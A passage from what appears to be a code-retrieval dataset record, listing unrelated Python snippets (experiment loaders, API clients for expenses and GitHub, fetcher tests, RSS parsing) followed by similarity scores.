api_seq = api_seq[\n # api_seq['dst'].apply(lambda nid: nid in unique_nodes)\n # ]\n\n node_pool = set(self.splits[2])\n api_seq = keep_from_set(api_seq, node_pool)\n\n return Experiment(self.embed, nodes, edges, api_seq, split_on=\"nodes\", neg_sampling_strategy=\"word2vec\", compact_dst=False)\n\n elif type == \"typeuse\":\n held = pandas.read_csv(join(self.base_path, \"held.csv\"))\n\n held = held.query('type == 2')[['src', 'dst']]\n\n # node_pool = set(self.splits[2])\n # held = keep_from_set(held, node_pool)\n\n return Experiment(self.embed, nodes, edges, held, split_on=\"nodes\", neg_sampling_strategy=\"word2vec\", compact_dst=False)\n\n elif type == \"varuse\":\n var_use = pandas.read_csv(self.experiments['varuse'])\n\n # unique_nodes = set(nodes['id'].values.tolist())\n node_pool = set(self.splits[2])\n\n var_use = var_use[\n var_use['src'].apply(lambda nid: nid in node_pool)\n ]\n\n return Experiment2(self.embed, nodes, edges, var_use, split_on=\"nodes\", neg_sampling_strategy=\"word2vec\")\n\n elif type == \"fname\":\n\n # fname = pandas.read_csv(self.experiments['fname'])\n functions = nodes.query('label == 4096')\n functions['fname'] = functions['name'].apply(lambda name: name.split(\".\")[-1])\n\n functions['src'] = functions['id']\n functions['dst'] = functions['fname']\n\n # unique_nodes = set(nodes['id'].values.tolist())\n node_pool = set(self.splits[2])\n\n functions = functions[\n functions['src'].apply(lambda nid: nid in node_pool)\n ]\n\n # use edge splits when outgoing degree is 1\n\n return Experiment2(self.embed, nodes, edges, functions[['src', 'dst']], split_on=\"edges\", neg_sampling_strategy=\"word2vec\")\n\n elif type == \"nodetype\":\n\n types = nodes.copy()\n types['src'] = nodes['id']\n types['dst'] = nodes['label']\n\n print(\"WARNING: Make sure that you target label is stored in the field: label\")\n # raise Warning(\"Make sure that you target label is stored in the field: label\")\n\n node_pool = set(self.splits[2])\n\n types['src'] = types['src'].apply(lambda nid: nid if nid in node_pool else None)\n types = types.dropna(axis=0)\n\n return Experiment3(self.embed, nodes, edges, types[['src', 'dst']], split_on=\"edges\", neg_sampling_strategy=\"word2vec\")\n else:\n raise ValueError(f\"Unknown experiment: {type}. 
The following experiments are available: [apicall|link|typeuse|varuse|fname|nodetype].\")", "def test_get_explore_join_stats(fc: fetcher.Fetcher, test_model):\n explore = fc.get_explores(\n model=test_model[\"name\"], explore=\"explore_2_joins_1_used\"\n )[0]\n field_stats = {\n \"explore_2_joins_1_used.d1\": 10,\n \"explore_2_joins_1_used.d2\": 5,\n \"explore_2_joins_1_used.d3\": 0,\n \"explore_2_joins_1_used.m1\": 0,\n \"join1.d1\": 10,\n \"join1.d2\": 10,\n \"join1.d3\": 10,\n \"join1.m1\": 0,\n \"join2.d1\": 0,\n \"join2.d2\": 0,\n \"join2.d3\": 0,\n \"join2.m1\": 0,\n }\n join_stats = fc.get_explore_join_stats(explore=explore, field_stats=field_stats)\n assert isinstance(join_stats, dict)\n assert len(join_stats) == 2\n assert join_stats == {\"join1\": 30, \"join2\": 0}", "def test_request_fetch_bogus_url():\n with pytest.raises(SystemExit):\n request.fetch(\"lsdfjlsdjf\")", "def find_experiments(model, version, page_index=0):\n\n # We use filter queries instead of regular boolean queries.\n # This is done so that the sort order isn't influenced.\n # We may need to add additional sorting to make a sensible resultset.\n search_query = {\n 'query': {\n 'bool': {\n 'filter': [\n {'term': {'model': model}},\n {'term': {'version': version}}\n ]\n }\n }\n }\n\n results = find_items('experiment', search_query, page_index)\n\n records = []\n total_items = results['hits']['total']\n\n # Elastic search always returns results, even when you request a non-existing page.\n # To prevent weird behavior in our api, we check for this and return empty results\n # when you requested an empty page.\n if total_items < page_index * PAGE_SIZE:\n return PagedResultSet(page_index, PAGE_SIZE, total_items, [])\n\n for item in results['hits']['hits']:\n records.append({\n 'model': item['_source']['model'],\n 'version': item['_source']['version'],\n 'name': item['_source']['experiment'],\n 'date_created': item['_source']['date_created']\n })\n\n return PagedResultSet(page_index, PAGE_SIZE, total_items, records)", "def geolife(redownload: bool = False) -> Dataset:\n return Dataset.get(\"geolife\", redownload=redownload)", "def get_links(proj,exp):\n response = do_method(\"experiment.info\",\n {\"proj\":proj,\"exp\":exp,\"aspect\":\"links\"})\n check_response(response)\n return response['value']", "def test_obtain_issues_exclude_wrong_severity(self, mock_url_read):\n mock_url_read.side_effect = [LAST_SCAN, '{\"reportId\": 22}', '{\"status\": {\"value\": \"Created\"}}',\n SAST_REPORT.format(false_positive=False, severity='Low')]\n self.__report.obtain_issues(['id'], 'high')\n issues = self.__report.issues()\n self.assertIsInstance(issues, List)\n self.assertEqual(len(issues), 0)", "def problem1() -> Dict[str, List[req.Response]]:\n keywords = collect_keywords(KEYWORDS)\n if len(keywords) == 0:\n raise Exception(\"[ERROR] No keywords were found in the keyword file!\")\n web_scraper = WebScraper(keywords) \n web_pages = web_scraper.crawl()\n return web_pages", "def fetch_models(self):\n if self.model_pool is None:\n print(\"Please train a model first.\", file=STDE)\n EXIT(1)\n else:\n return [copy.deepcopy(m.steps[-1][-1]) for m in self.model_pool]", "def do_fetch(self):\n pass", "def __init__(self, requested_experiments, experiment_meta_model):\n # Ensure that ExperimentMetaInfo is the type of all experiments.\n if not False in [isinstance(exp, experiment_meta_model) for exp in requested_experiments]: \n self.req_exps = requested_experiments \n else:\n self.req_exps = [experiment_meta_model.objects.get(pk=exp.pk) \n 
for exp in requested_experiments]\n \n self.app_label = experiment_meta_model._meta.app_label\n for exp in self.req_exps:\n if exp.measurementmodel is None:\n raise NoRelatedMeasurementModel(exp)", "def get_by_id(self, expense_id):\n return self._get_request({}, Expenses.GET_EXPENSE_BY_ID.format(expense_id))", "def test_get_pricehistory_non_existing_product(self):\n res = self.get(url=\"/products/10/pricehistory\", role=\"admin\")\n self.assertException(res, exc.EntryNotFound)", "def viewexperiments(request):\r\n # Obtain the context from the HTTP request.\r\n\r\n context_instance = RequestContext(request)\r\n\r\n try:\r\n user = _validate_and_get_geniuser(request)\r\n except LoggedInButFailedGetGeniUserError:\r\n return _show_failed_get_geniuser_page(request)\r\n\r\n\r\n page_top_errors = []\r\n username = user.username\r\n ret = [] #returning list\r\n user_experiments = Experiment.objects.filter(geni_user=user)\r\n for experiment in reversed(user_experiments):\r\n #reversed so the oldest experiment is the last we show.\r\n experiment_sensors = []\r\n name_list = []\r\n experiment_sensors.extend(list(Battery.objects.filter(experiment_id=experiment)))\r\n experiment_sensors.extend(list(Bluetooth.objects.filter(experiment_id=experiment)))\r\n experiment_sensors.extend(list(Cellular.objects.filter(experiment_id=experiment)))\r\n experiment_sensors.extend(list(Settings.objects.filter(experiment_id=experiment)))\r\n experiment_sensors.extend(list(ConcretSensor.objects.filter(experiment_id=experiment)))\r\n experiment_sensors.extend(list(Location.objects.filter(experiment_id=experiment)))\r\n experiment_sensors.extend(list(Signal_strengths.objects.filter(experiment_id=experiment)))\r\n experiment_sensors.extend(list(Wifi.objects.filter(experiment_id=experiment)))\r\n\r\n for sensor in experiment_sensors:\r\n name_list.append(sensor.show_name())\r\n\r\n if name_list == []:\r\n name_list = \"None\"\r\n\r\n ret.append([experiment.expe_name,name_list,experiment.id])\r\n \r\n \r\n \r\n return render(request, 'control/viewexperiments.html', {'username' : username, \r\n 'page_top_errors' : page_top_errors, 'ret':ret})", "def test_obtain_issues_response_error(self, mock_error, mock_url_read):\n mock_url_read.return_value = 'non-json'\n self.__report.obtain_issues(['id'], 'high')\n issues = self.__report.issues()\n self.assertIsInstance(issues, List)\n self.assertEqual(len(issues), 0)\n self.assertEqual(mock_error.call_args[0][0], \"Error loading json: %s.\")\n self.assertIsInstance(mock_error.call_args[0][1], ValueError)", "def load_demo(exploration_id):\n if not (0 <= int(exploration_id) < len(feconf.DEMO_EXPLORATIONS)):\n raise Exception('Invalid demo exploration id %s' % exploration_id)\n\n exploration = feconf.DEMO_EXPLORATIONS[int(exploration_id)]\n\n if len(exploration) == 3:\n (exp_filename, title, category) = exploration\n image_filename = None\n elif len(exploration) == 4:\n (exp_filename, title, category, image_filename) = exploration\n else:\n raise Exception('Invalid demo exploration: %s' % exploration)\n\n image_id = None\n if image_filename:\n image_filepath = os.path.join(\n feconf.SAMPLE_IMAGES_DIR, image_filename)\n image_id = image_models.Image.create(utils.get_file_contents(\n image_filepath, raw_bytes=True))\n\n yaml_content = utils.get_sample_exploration_yaml(exp_filename)\n exploration_id = create_from_yaml(\n yaml_content, ADMIN_COMMITTER_ID, title, category,\n exploration_id=exploration_id, image_id=image_id)\n\n exploration = get_exploration_by_id(exploration_id)\n 
exploration.is_public = True\n save_exploration(ADMIN_COMMITTER_ID, exploration)\n\n logging.info('Exploration with id %s was loaded.' % exploration_id)", "def test_get_rate_article_not_found(self):\n self.client.credentials(HTTP_AUTHORIZATION='Bearer ' + self.token)\n response = self.client.get(\n self.view_rates_url + str(2) + \"/\",\n format='json')\n self.assertEqual(\n 0,\n response.data[\"rates\"])\n self.assertEqual(204, status.HTTP_204_NO_CONTENT)", "def _create_explore_query(self, explore: Explore, model_name: str) -> Query:\n dimensions = [dimension.name for dimension in explore.dimensions]\n query = self.client.create_query(model_name, explore.name, dimensions)\n return Query(query[\"id\"], lookml_ref=explore, explore_url=query[\"share_url\"])", "def GetModels(self, request, context):\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')", "def read_next():\n try:\n response = requests.get(APIURL + '/articles/?format=json&random=yes')\n parser = json.loads(response.content)\n return parser\n except:\n raise Http404(\"Article does not exist\")", "def get_list(self, resp):\n expenses = resp['expenses']\n expense_list = ExpenseList()\n for value in expenses:\n expense = Expense()\n expense.set_expense_id(value['expense_id'])\n expense.set_date(value['date'])\n expense.set_account_name(value['account_name'])\n expense.set_paid_through_account_name(value[\\\n 'paid_through_account_name'])\n expense.set_description(value['description'])\n expense.set_currency_id(value['currency_id'])\n expense.set_currency_code(value['currency_code'])\n expense.set_bcy_total(value['bcy_total'])\n expense.set_total(value['total'])\n expense.set_is_billable(value['is_billable'])\n expense.set_reference_number(value['reference_number'])\n expense.set_customer_id(value['customer_id'])\n expense.set_customer_name(value['customer_name'])\n expense.set_vendor_id(value['vendor_id'])\n expense.set_vendor_name(value['vendor_name'])\n expense.set_status(value['status'])\n expense.set_created_time(value['created_time'])\n expense.set_expense_receipt_name(value['expense_receipt_name'])\n expense_list.set_expenses(expense)\n page_context_obj = PageContext()\n page_context = resp['page_context']\n page_context_obj.set_page(page_context['page'])\n page_context_obj.set_per_page(page_context['per_page'])\n page_context_obj.set_has_more_page(page_context['has_more_page'])\n page_context_obj.set_report_name(page_context['report_name'])\n page_context_obj.set_applied_filter(page_context['applied_filter'])\n page_context_obj.set_sort_column(page_context['sort_column'])\n page_context_obj.set_sort_order(page_context['sort_order'])\n expense_list.set_page_context(page_context)\n\n return expense_list", "def get_images_by_vulnerability(self, **kwargs):\n ...", "def test_api_can_get_all_expenses(self):\n self.register_user()\n result = self.login_user()\n access_token = json.loads(result.data.decode())['access_token']\n res = self.client().post('/expenses/', headers=dict(Authorization=\"Bearer \" + access_token), data=self.expense)\n self.assertEqual(res.status_code, 201)\n res = self.client().get('/expenses/', headers=dict(Authorization=\"Bearer \" + access_token))\n self.assertEqual(res.status_code, 200)\n results = json.loads(res.data)\n self.assertEqual(results['items'][0]['name'], self.expense['name'])", "def GetModels(self, request, context):\n context.code(beta_interfaces.StatusCode.UNIMPLEMENTED)", "def 
test_get_list_most_expensive(self):\n\n expensive_goods_test = self.info_list.get_list_most_expensive()\n most_expensive_test = self.form_expensive_list_goods()\n\n self.assertEqual(expensive_goods_test, most_expensive_test)", "def explore(self, episode_count):\n # single agent, always use the `run_one_episode` api.\n # multi agent with `standalone` api_type, use the `run_one_episode` api.\n if self.env_info[\"api_type\"] == \"standalone\":\n # (use_explore, collect)\n _paras = [\n (True, False if _ag.alg.async_flag else True) for _ag in self.agents\n ]\n job_funcs = [agent.run_one_episode for agent in self.agents]\n for _epi_index in range(episode_count):\n _start2 = time()\n self.env.reset()\n for agent in self.agents:\n agent.reset()\n\n trajectory_list = self.bot.do_multi_job(job_funcs, _paras)\n for agent, trajectory in zip(self.agents, trajectory_list):\n if not agent.alg.async_flag:\n # self.trajectories.append(trajectory)\n self.send_explorer.send(trajectory)\n\n self._post_processes()\n self.ag_stats.explore_time_in_epi = time() - _start2\n\n if _epi_index == episode_count - 1:\n self.ag_stats.update_with_agent_stats(\n [agent.get_perf_stats() for agent in self.agents]\n )\n\n elif self.env_info[\"api_type\"] == \"unified\":\n for _ in range(episode_count):\n _start2 = time()\n trajectories = self._run_one_unified_episode(\n use_explore=True, collect=True)\n\n for _ag, trajectory in zip(self.agents, trajectories):\n if not _ag.alg.async_flag:\n # self.trajectories.append(trajectory)\n self.send_explorer.send(trajectory)\n\n self._post_processes()\n self.ag_stats.explore_time_in_epi = time() - _start2\n else:\n pass\n\n self.clear_trajectories()\n return self.ag_stats.get()", "def test_fetch_malform_url(self):\n url = 'http://githubcom'\n with self.assertRaises(InvalidGitHubUrl):\n GitHubRepoFetcher().fetch(url)", "def fetch(self,url=URL):\n\t\tlog.info('downloading latest PHE case data')\n#\t\tself.data=lookup_json(url)\n\t\tself.fetch_csv() #JSON discontinued; switched back to CSV\n\t\tself.edition=self.latest_samples\n\t\tlog.info(f'Last samples from {self.edition}')", "def retrieve_data(self, url: str) -> Tuple[Optional[List[dict]], Optional[httpx.Response]]:\n timeout = 30\n timeout_count = 0\n num_attempts = 1\n while num_attempts <= 10:\n\n response = hit_api(self.key_manager, url, self.logger, timeout)\n\n if response is None:\n if timeout_count == 10:\n self.logger.error(f\"Request timed out 10 times for {url}\")\n return None, None, GithubApiResult.TIMEOUT\n\n timeout = timeout * 1.1\n num_attempts += 1\n continue\n\n # if api returns a status of 204 No Content then return empty list\n if response.status_code == 204:\n return [], response, GithubApiResult.SUCCESS\n \n \n page_data = parse_json_response(self.logger, response)\n\n\n # if the data is a list, then return it and the response\n if isinstance(page_data, list) is True:\n return page_data, response, GithubApiResult.SUCCESS\n\n # if the data is a dict then call process_dict_response, and \n if isinstance(page_data, dict) is True:\n dict_processing_result = process_dict_response(self.logger, response, page_data)\n\n if dict_processing_result == GithubApiResult.NEW_RESULT:\n self.logger.info(f\"Encountered new dict response from api on url: {url}. 
Response: {page_data}\")\n return None, None, GithubApiResult.NEW_RESULT\n\n if dict_processing_result == GithubApiResult.REPO_NOT_FOUND:\n return None, response, GithubApiResult.REPO_NOT_FOUND\n\n if dict_processing_result in (GithubApiResult.SECONDARY_RATE_LIMIT, GithubApiResult.ABUSE_MECHANISM_TRIGGERED):\n continue\n\n if dict_processing_result == GithubApiResult.RATE_LIMIT_EXCEEDED:\n num_attempts = 0\n continue \n\n if isinstance(page_data, str) is True:\n str_processing_result: Union[str, List[dict]] = self.process_str_response(page_data)\n\n if isinstance(str_processing_result, list):\n return str_processing_result, response, GithubApiResult.SUCCESS\n\n num_attempts += 1\n\n self.logger.error(\"Unable to collect data in 10 attempts\")\n return None, None, GithubApiResult.NO_MORE_ATTEMPTS", "def get_exposure(exposure_id,b_mean,b_sd,c_mean,c_sd,non_rate,dist_type,mortalities):#id in db\n\te_id \t\t= int(long(exposure_id))\n\texposure_outcomes = DBHelper.exposure_outcome\n\toutcome_ids \t= DBHelper.exposure_outcome.get(e_id)\n\n\tsamples_rr \t= DBHelper.samples_rr.get(e_id)\n\tsamples_pop \t= DBHelper.samples_pop.get(e_id)\n\trisks \t\t= DBHelper.risks.get(e_id)\n\tmeasure \t= DBHelper.measures.get(e_id)\n\tdist_type \t= get_dist_type(e_id)\n\n\t#get population distribution \n\tpopDistribution = PopDistribution(DBHelper.age_group_num,non_rate,b_mean,b_sd,c_mean,c_sd,samples_pop,dist_type)\n\n\t#get outcomes\n\toutcomes = []\n\tfor o_id in outcome_ids:\n\t\t# mortality\n\t\tm_mortality = mortalities.get(2*o_id)\n\t\tf_mortality = mortalities.get(2*o_id+1)\n\t\t# risks\n\t\tm_risks = risks.get(2*o_id)\n\t\tf_risks = risks.get(2*o_id+1)\n\t\t# outcome name\n\t\tname = DBHelper.get_outcome_name(o_id)\n\t\t# limit estimates\n\t\tlle = DBHelper.exposure_outcome.get(e_id).get(o_id)[0]\n\t\tule = DBHelper.exposure_outcome.get(e_id).get(o_id)[1]\n\t\t# outcome\n\t\toutcome = PrimeOutcome(name,o_id,m_mortality,f_mortality,samples_rr,m_risks,f_risks,lle,ule,measure,e_id) \n\t\toutcomes.append(outcome)\n\n\texposure = PrimeExposure(mortalities,outcome_ids,samples_rr,samples_pop,outcomes,popDistribution)\n\treturn exposure", "def test_api_predictors_get(self):\n pass", "def __getitem__(self, url):\n try:\n record = self.es.get(index=self.index, doc_type=self.doc_type, id=url)['_source']['result']\n return record\n except elasticsearch.NotFoundError as e:\n raise KeyError(url + ' does not exist')", "def experiences(self):\n return self.client.call('GET',\n self.name + 'experiences')", "def get(self) -> list:\n return self.__expedition", "def load(extended=False):\n\n _fetch_large()\n if extended:\n return _load(cache_experiment_extended, _parse_experiment)\n else:\n return _load(cache_experiment, _parse_experiment)", "def GetModel(self, request, context):\n context.code(beta_interfaces.StatusCode.UNIMPLEMENTED)", "def fetch_maybe(cls, url, path, save=False):\n if os.path.isfile(path):\n # print(\"Found %s\" % os.path.basename(path))\n with open(path, \"rb\") as file:\n return file.read(), True\n if save:\n return cls.fetch_and_save(url, path), False\n return cls.fetch_with_retry(url), False", "def retrieve(self, request, pk=None):\n\n try:\n expense = Expenses.objects.get(pk=pk)\n serializer = ExpenseSerializer(\n expense, context={'request': request})\n return Response(serializer.data)\n except Exception as ex:\n return HttpResponseServerError(ex)", "def call(url):\n result = requests.get(url)\n if 300 <= result.status_code < 400:\n raise TemporaryException\n if result.status_code == 429:\n raise 
ApiCountZeroException\n if 400 <= result.status_code < 600:\n raise PermanentException\n return result", "def make(self, method, extras=None):\n query = self.url_for_request(method, extras)\n logging.info(query)\n\n req = urllib2.Request(query)\n if self.shouldGzip:\n req.add_header('Accept-encoding', 'gzip')\n req.add_header('User-agent', 'Last.fm Explorer')\n\n result = { 'success' : False }\n\n max_retries = 2 \n attempt = 0\n\n while not result['success'] and attempt < max_retries:\n attempt += 1\n try:\n r = urllib2.urlopen(req, timeout=60).read()\n result['data'] = self.__unzip(r) if self.shouldGzip else r\n result['success'] = True\n if self.saveResponses:\n self.__save_response(method, extras, result['data'])\n\n except urllib2.HTTPError, e:\n logging.error(\"Requestor errored accessing \" + query + \" - \" + str(e.code))\n result['error'] = { 'code' : e.code, 'message' : e.msg }\n\n except urllib2.URLError, e:\n logging.error(\"Requestor failed to fetch \" + query + ' - URLError.')\n result['error'] = { 'message' : e.reason }\n\n except BadStatusLine:\n logging.error(\"Requestor caught BadStatusLine, attempt %d\" % (attempt,))\n result['error'] = { 'message' : \"Request gave BadStatusLine\" }\n\n except IOError, e:\n logging.error(\"Requestor caught IOError, attempt %d\" % (attempt,))\n result['error'] = { 'message' : \"Request gave IOError: \" + str(e) }\n\n except Exception as instance:\n logging.error(\"Requestor caught unknown exception for request \" + query + \" - \" + str(type(instance)))\n logging.error(traceback.format_exc())\n result['error'] = { 'messasge' : \"Unknown problem\" }\n\n return result", "def get(self, expense_id):\n url = base_url + expense_id\n resp = zoho_http_client.get(url, self.details, self.headers)\n return parser.get_expense(resp)", "def _extract_articles(self, target):\n feed_response, modified, etag = self._get_recent_feed(target)\n\n # Bozo is a tag which tells that the RSS hasn't been parsed correctly.\n if feed_response.bozo:\n exc = feed_response.bozo_exception\n if not isinstance(exc, self.ALLOWED_EXCEPTIONS):\n raise exc\n\n articles = []\n count = 0\n if self._manage_status(feed_response, target):\n for feed_entry in feed_response.entries:\n if self._limit and count >= self._limit:\n logging.info(\n \"Crawling limit of %d article(s) was reached for this target.\",\n count\n )\n break\n try:\n article = self.extract_article(feed_entry, target)\n except Exception as exc:\n # NOTE(cmiN): On Stackdriver Error Reporting we don't want to catch\n # (with `logging.exception`) \"Not Found\" errors, because they are\n # pretty frequent and usual, therefore ignore-able.\n log_function = (\n logging.error if \"404\" in str(exc) else logging.exception\n )\n log_function(\"Got %s while parsing %r.\", exc, feed_entry.id)\n else:\n articles.append(article)\n count += 1\n target.checkpoint(modified, etag)\n\n return articles", "def get_exchanges():\n url = 'https://help.yahoo.com/kb/finance-for-web/SLN2310.html?impressions=true'\n dataframes = pd.read_html(url)\n return dataframes[0]", "def fetch(self):\n raise NotImplementedError()", "def run(self):\n if self.parsed_args.fetch_cache:\n issues = self.backend.fetch_from_cache()\n else:\n issues = self.backend.fetch(from_date=self.from_date)\n\n try:\n for issue in issues:\n obj = json.dumps(issue, indent=4, sort_keys=True)\n # self.outfile.write(issue['url']+\"\\n\")\n self.outfile.write(obj)\n self.outfile.write('\\n')\n except requests.exceptions.HTTPError as e:\n raise 
requests.exceptions.HTTPError(str(e.response.json()))\n except IOError as e:\n raise RuntimeError(str(e))\n except Exception as e:\n if self.backend.cache:\n self.backend.cache.recover()\n raise RuntimeError(str(e))" ]
[ "0.79972434", "0.6808644", "0.64591634", "0.6081574", "0.6081095", "0.6056974", "0.5249449", "0.5153191", "0.5144307", "0.5057118", "0.49663934", "0.49415502", "0.4938596", "0.49360746", "0.49263144", "0.4916875", "0.49087682", "0.48916966", "0.48450214", "0.4824901", "0.48051685", "0.48000914", "0.47367904", "0.47179312", "0.46975544", "0.4694692", "0.46923035", "0.46534842", "0.46450973", "0.4628136", "0.4605014", "0.4594456", "0.4590412", "0.4589578", "0.45890552", "0.45690802", "0.45573905", "0.45546696", "0.45496222", "0.4543777", "0.45434904", "0.45431328", "0.45425966", "0.45409822", "0.453488", "0.45295477", "0.4517089", "0.4492424", "0.44917402", "0.44875965", "0.44847995", "0.44771248", "0.4473027", "0.44726917", "0.44699636", "0.44623104", "0.44604158", "0.4453867", "0.44537666", "0.44477496", "0.44441387", "0.44439906", "0.4438836", "0.4434277", "0.44338807", "0.44297993", "0.442709", "0.44267425", "0.44208613", "0.44143292", "0.44141978", "0.44061273", "0.44058302", "0.43878475", "0.43873137", "0.43865347", "0.43855476", "0.43845892", "0.43827713", "0.437795", "0.4377775", "0.437737", "0.43746188", "0.43728155", "0.43707606", "0.43695754", "0.4367101", "0.4364784", "0.436137", "0.4360388", "0.43603504", "0.43527612", "0.43492246", "0.43462956", "0.43451667", "0.43392137", "0.43331987", "0.43319952", "0.4330668", "0.43272278" ]
0.73947066
1
fetcher.get_used_explores() should return all used explores.
def test_get_used_explores(fc: fetcher.Fetcher, test_model, test_used_explore_names):
    used_explores = fc.get_used_explores(model=test_model["name"])
    assert isinstance(used_explores, dict)
    assert all(e in test_used_explore_names for e in used_explores)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def test_get_unused_explores(fc: fetcher.Fetcher, test_model, test_unused_explores):\n unused_explores = fc.get_unused_explores(model=test_model[\"name\"])\n assert all(e in test_unused_explores for e in unused_explores)", "def test_get_explores_filters(fc: fetcher.Fetcher):\n explores = fc.get_explores(model=\"henry_dusty\")\n assert all(e.model_name == \"henry_dusty\" for e in explores)\n\n explores = fc.get_explores(model=\"henry_qa\", explore=\"explore_2_joins_all_used\")\n assert all(\n e.model_name == \"henry_qa\" and e.name == \"explore_2_joins_all_used\"\n for e in explores\n )", "def test_get_explores(fc: fetcher.Fetcher):\n explores = fc.get_explores()\n assert isinstance(explores, list)\n assert len(explores) > 0\n assert isinstance(explores[0], models.LookmlModelExplore)", "def exploits(self):\n return self.rpc.call(MsfRpcMethod.ModuleExploits)['modules']", "def test_get_explore_field_stats(\n fc: fetcher.Fetcher,\n looker_sdk: methods.Looker40SDK,\n test_model,\n test_used_explore_names,\n test_explores_stats,\n):\n explore = fc.get_explores(\n model=test_model[\"name\"], explore=test_used_explore_names[0]\n )[0]\n actual_stats = fc.get_explore_field_stats(explore)\n assert isinstance(actual_stats, dict)\n\n for e in test_explores_stats:\n if e[\"name\"] == test_used_explore_names[0]:\n expected_stats = e\n\n assert all(actual_stats[k] == 0 for k in expected_stats[\"unused_fields\"])\n assert all(actual_stats[k] > 0 for k in expected_stats[\"used_fields\"])", "def get_exploits():\n results = {}\n for loader, name, ispkg in pkgutil.walk_packages(acsploit.exploits.__path__):\n m = loader.find_module(name).load_module(name)\n\n if not ispkg and hasattr(m, 'options') and hasattr(m, 'run'):\n exploit = name.replace('.', '/')\n results[exploit] = m\n\n return results", "def get_expenses(self, parameter=None):\n resp = zoho_http_client.get(base_url, self.details, self.headers, parameter)\n return parser.get_list(resp)", "def summarize_unused_offers(app_queue: Optional[MarathonQueueItem]) -> Dict[str, int]:\n unused_offers = get_app_queue_last_unused_offers(app_queue)\n reasons: Dict[str, int] = defaultdict(lambda: 0)\n for offer in unused_offers:\n for reason in offer[\"reason\"]:\n reasons[reason] += 1\n return reasons", "def get_usages(self):\n return self.client._perform_json(\"GET\", \"/projects/%s/managedfolders/%s/usages\" % (self.project_key, self.odb_id))", "def popular_items(self):\n if self._popular_items is None:\n self._popular_items = self._get_popular_items(100)\n return self._popular_items", "def test_get_list_most_expensive(self):\n\n expensive_goods_test = self.info_list.get_list_most_expensive()\n most_expensive_test = self.form_expensive_list_goods()\n\n self.assertEqual(expensive_goods_test, most_expensive_test)", "def get_malware_used_by_groups():\n global malware_used_by_groups\n\n if not malware_used_by_groups:\n malware_used_by_groups = rsh.malware_used_by_groups(get_srcs())\n\n return malware_used_by_groups", "def _count_explores(self) -> int:\n explore_count = 0\n for model in self.project.models:\n explore_count += len(model.explores)\n return explore_count", "def unused_evals(self):\n\t\treturn self.Evals - self.nFES", "def get_low_use_instances(self):\n response = self.support.describe_trusted_advisor_check_result(checkId=LOW_USE_CHECK_ID, language='en')\n if 'result' in response:\n return response['result'].get('flaggedResources', [])", "def sitetotalrequests(self) :\n\t\ttry :\n\t\t\treturn self._sitetotalrequests\n\t\texcept Exception as 
e:\n\t\t\traise e", "def explores(self, explores):\n\n self._explores = explores", "def info_cache():\n return [custom_hit, custom_miss, len(custom_memory), total_custom_memory]", "def get_low_use_instances(self):\n return self.low_use.batch_get_item(EmailSent=True)", "def instances_used(self):\n return None", "def read_used():\n used_hashes = {\"evs\": set([]),\n \"cache\": set([]),\n \"seeds\": set([])}\n\n with open(LOG_FILEPATH, 'rb') as logfile:\n for line in logfile.readlines():\n kind, hash = tuple(line.split('...'))\n used_hashes[kind].add(hash.rstrip())\n\n return used_hashes", "def _get_global_popular_resources_uris(self,\n num_entries: int,\n resource_type: ResourceType = ResourceType.Table) -> List[str]:\n LOGGER.info('Querying global popular resources URIs')\n\n num_readers = app.config['POPULAR_RESOURCES_MINIMUM_READER_COUNT']\n\n relation_model = resource_relation_model[resource_type][UserResourceRel.read]\n res_key = f'{resource_type.name.lower()}_rk'\n res_attr = getattr(relation_model, res_key)\n user_attr = getattr(relation_model, 'user_rk')\n read_count_attr = getattr(relation_model, 'read_count')\n\n with self.client.create_session() as session:\n readers = func.count(user_attr).label('readers')\n usage_subquery = session.query(\n res_attr.label('res_key'),\n readers,\n func.sum(read_count_attr).label('total_reads')\n ).group_by(res_attr).having(readers >= num_readers).subquery()\n\n popular_usage = session.query(usage_subquery.c.res_key).order_by(\n (usage_subquery.c.readers * func.log(usage_subquery.c.total_reads)).desc()\n ).limit(num_entries).all()\n\n return [usage.res_key for usage in popular_usage]", "def form_expensive_list_goods(self): \n\n self.database.truncate_all_tables()\n\n self.database.add(GoodInfo(\"рыба мороженая, Кета 1кг\", \n \"400\", \"5\", \"2020-12-30\", \"90\", \"2020-12-30\"))\n \n most_expensive_test_list = self.database.get_all_goods()\n\n\n return most_expensive_test_list", "def test_tags_recently_used_count(self):\n\n po = self.catalog.load_pageobject('TagsPage')\n po.goto_page()\n tags = po.get_recently_used_tags()\n assert len(tags) <= 25, \\\n \"# tags is %s, which is greater than 25\" % (len(tags))", "def used_by(self):\n response = check_defined(self, inspect.stack()[0][3])\n if not response:\n return response\n if 'used_by' in self.se.full_class_only_graph.nodes[self.uri]:\n response = self.se.full_class_only_graph.nodes[self.uri]['used_by']\n result = restructure_output(self,\n response,\n inspect.stack()[0][3],\n self.output_type)\n return result\n else:\n return []", "def getExpired(self, idle=365):\n cutOff = datetime.datetime.now() - datetime.timedelta(days=idle)\n return [x for x in self.xeps if x.status == \"Experimental\" and x.date < cutOff]", "def test_collect_demands(self):\n pass", "def strategy_expensive(cookies, cps, history, time_left, build_info):\n print\n print \"STRATEGY PART BEGIN\"\n print\n items_available = []\n for item in build_info.build_items():\n items_available.append(item)\n while items_available:\n max_cost = 0\n for item in items_available:\n #print \"item:\", item, \", cost:\", build_info.get_cost(item)\n if build_info.get_cost(item) > max_cost:\n max_cost = build_info.get_cost(item)\n most_expensive = item\n print \"most expensive:\", most_expensive\n # check if time enough\n print \"checking time\"\n print \"time left:\", time_left\n print \"cost:\", max_cost\n print \"cookies can be produced:\", cps * time_left\n if cps * time_left + cookies < max_cost:\n items_available.remove(most_expensive)\n 
